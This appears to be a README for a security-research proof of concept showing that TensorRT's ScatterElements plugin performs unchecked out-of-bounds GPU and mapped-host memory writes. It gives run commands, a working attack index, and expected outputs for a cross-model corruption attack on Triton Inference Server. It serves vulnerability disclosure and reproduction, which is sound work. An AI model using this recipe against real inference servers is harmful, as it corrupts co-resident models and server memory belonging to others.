Add TensorRT ScatterElements memory-corruption PoC

eb5799c verified 9 days ago

3.61 kB

library_name: tensorrt
tags:
  - security-research
  - vulnerability-reproduction
  - tensorrt
  - triton-inference-server

TensorRT ScatterElements GPU and mapped-host OOB write PoC

This repository demonstrates that the stock TensorRT ScatterElements plugin uses runtime indices in GPU pointer arithmetic without normalization or bounds validation.

Tested configurations:

TensorRT 11.1.0.106 on Windows
TensorRT 10.16.1.11 on Linux
Triton Inference Server 2.69.0 with TensorRT 10.16.1.11
NVIDIA RTX 3080 Laptop GPU

The artifacts are synthetic. They do not execute host code or access files.

Local primitive

Build the engine and run the local proof:

python make_engine.py
python run_probe.py

The proof checks three cases:

An out-of-range positive index updates a separate CUDA allocation.
The documented-valid index -1 writes before the output buffer instead of selecting its last element.
An in-range control leaves the marker allocation unchanged.

host_pinned_probe.py additionally targets a benign cudaHostAllocPortable marker through its CUDA device mapping:

python host_pinned_probe.py

Expected result:

CROSS_ALLOCATION_WRITE=True
VALID_NEGATIVE_INDEX_OOB_WRITE=True
CONTROL_CLEAN=True
MAPPED_HOST_WRITE=True

Triton cross-model proof

The Linux plans were built with TensorRT 10.16.1.11:

scatter_elements_trt10.plan
victim_slow_trt10.plan

start_triton.sh expects the official Triton 2.69.0 standalone bundle under ~/triton-2.69/server/tritonserver and the Python environment under ~/triton-2.69/venv.

Run the control and attack:

./start_triton.sh
python triton_setup.py
python triton_race_probe.py --skip-load 0 200 0.0

./start_triton.sh
python triton_setup.py
python triton_race_probe.py --skip-load 740 200 0.0

triton_setup.py uses Triton's model-load API to automate operator setup. With --skip-load, triton_race_probe.py makes no model-control request; the attack phase consists solely of ordinary inference requests to the deployed scatter_writer model while a co-resident model is executing.

Expected result:

# control
victim_before=31343.25
victim_after=31343.25
TARGET_CHANGED=False

# attack
victim_before=31343.25
victim_after=32680.5
TARGET_CHANGED=True

The fixed index 740 was reproduced against fresh, uninstrumented Triton processes. cuda_trace.c is included only to document how the relative GPU offset was initially measured; it is not loaded for the final control or attack runs.

The same primitive reaches Triton's CUDA-pinned host pool. triton_host_metadata_output.txt records a remote inference request changing a live pool metadata word at 0x204c00030 from 0x10000000 to 0x44a72800. GDB was used only to read the before/after bytes; the server and attack request were uninstrumented.

Evidence

windows_stock_output.txt: local TensorRT 11.1 proof
linux_stock_output.txt: local TensorRT 10.16 proof
triton_control_output.txt: 200 in-range inference requests
triton_attack_repeatability.txt: three fresh Triton attack runs
windows_host_pinned_output.txt and linux_host_pinned_output.txt: mapped host-marker writes
triton_host_metadata_output.txt: remote write into live Triton pinned-pool metadata

SHA-256

02cc96cfa0c55c21058c0266ec85f72326f0c19cf245f01dac95f858d20c16fd  scatter_elements.engine
37640bd4f3d153cb23e3e147f8127d7ce0558065fd09de21593d9a26f52bc4ae  scatter_elements_trt10.plan
1f51adc48f98615d548a5a3a7f0f320e3c1b23e7f48205b21554ba850379d7b0  victim_slow_trt10.plan